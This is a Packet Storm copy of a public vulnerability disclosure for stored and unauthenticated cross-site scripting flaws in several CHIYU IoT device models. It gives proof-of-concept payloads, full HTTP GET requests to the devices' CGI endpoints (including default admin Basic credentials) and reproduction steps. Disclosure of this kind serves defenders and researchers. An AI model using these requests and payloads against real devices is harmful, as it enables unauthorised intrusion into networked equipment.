what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

CHIYU IoT Cross Site Scripting

CHIYU IoT Cross Site Scripting
Posted Jun 1, 2021
Authored by sirpedrotavares

CHIYU IoT devices suffer from multiple cross site scripting vulnerabilities. Versions affected include BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC.

tags | exploit, vulnerability, xss
advisories | CVE-2021-31250, CVE-2021-31641, CVE-2021-31643
SHA-256 | a0e148bec7337cb5cb6a2196c1eaeb2f732ddeb5e61a399ebf58969e953122ea

CHIYU IoT Cross Site Scripting

Change Mirror Download
# Exploit Title: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)
# Date: May 31 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC - all firmware versions < June 2021
# Tested on: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC
# CVE: CVE-2021-31250 / CVE-2021-31641 / CVE-2021-31643
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks

Description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.

#1: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices
CVE ID: CVE-2021-31250
CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250

============= PoC 01 ===============
Affected parameter: TF_submask
Component: if.cgi
Payload: "><script>alert(123)</script>

HTTP Request:
GET
/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY
HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/ap_tcps.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1


Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (if.cgi)
3. Append the payload at the end of the vulnerable parameter (TF_submask)
4. Submit the request and observe payload execution

============= PoC 02 ===============
Affected parameter: TF_hostname=Component: dhcpc.cgi
Payload: /"><img src="#">
HTTP request and response:

HTTP Request:
GET
/dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY
HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/wan_dc.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1


Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (dhcpc.cgi)
3. Append the payload at the end of the vulnerable parameter (TF_hostname)
4. Submit the request and observe payload execution

============= PoC 03 ===============
Affected parameter: TF_servicename=Component: ppp.cgi
Payload: "><script>alert(123)</script>

GET
/ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY
HTTP/1.1
Host: 192.168.187.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.143/wan_pe.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1


Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (ppp.cgi)
3. Append the payload at the end of the vulnerable parameter
(TF_servicename)
4. Submit the request and observe payload execution

============= PoC 04 ===============
Affected parameter: TF_port=Component: man.cgi
Payload: /"><img src="#">

GET
/man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY
HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/manage.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1


Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (man.cgi)
3. Append the payload at the end of the vulnerable parameter (TF_port)
4. Submit the request and observe payload execution



#2: Unauthenticated XSS in several CHIYU IoT devices
CVE ID: CVE-2021-31641
Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641


Component: any argument passed via URL that results in an HTTP-404
Payload: http://ip/<script>alert(123)</script>


Steps to reproduce:
1. Navigate to the webpage of the vulnerable device
2. On the web-browsers, you need to append the payload after the IP
address (see payload above)
3. Submit the request and observe payload execution


#3: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices
CVE ID: CVE-2021-31643
Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643

Affected parameter: username=
Component: if.cgi
Payload: "><script>alert(1)</script>

HTTP request - SEMAC Web Ver7.2

GET
/if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/EmpRcd.htm
Cookie: fresh=; remote=00000000
Upgrade-Insecure-Requests: 1


HTTP request - BIOSENSE-III-COMBO(M1)(20000)

GET
/if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/EmpRcd.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1


Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (if.cgi)
3. Append the payload at the end of the vulnerable parameter (username)
4. Submit the request and observe payload execution
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close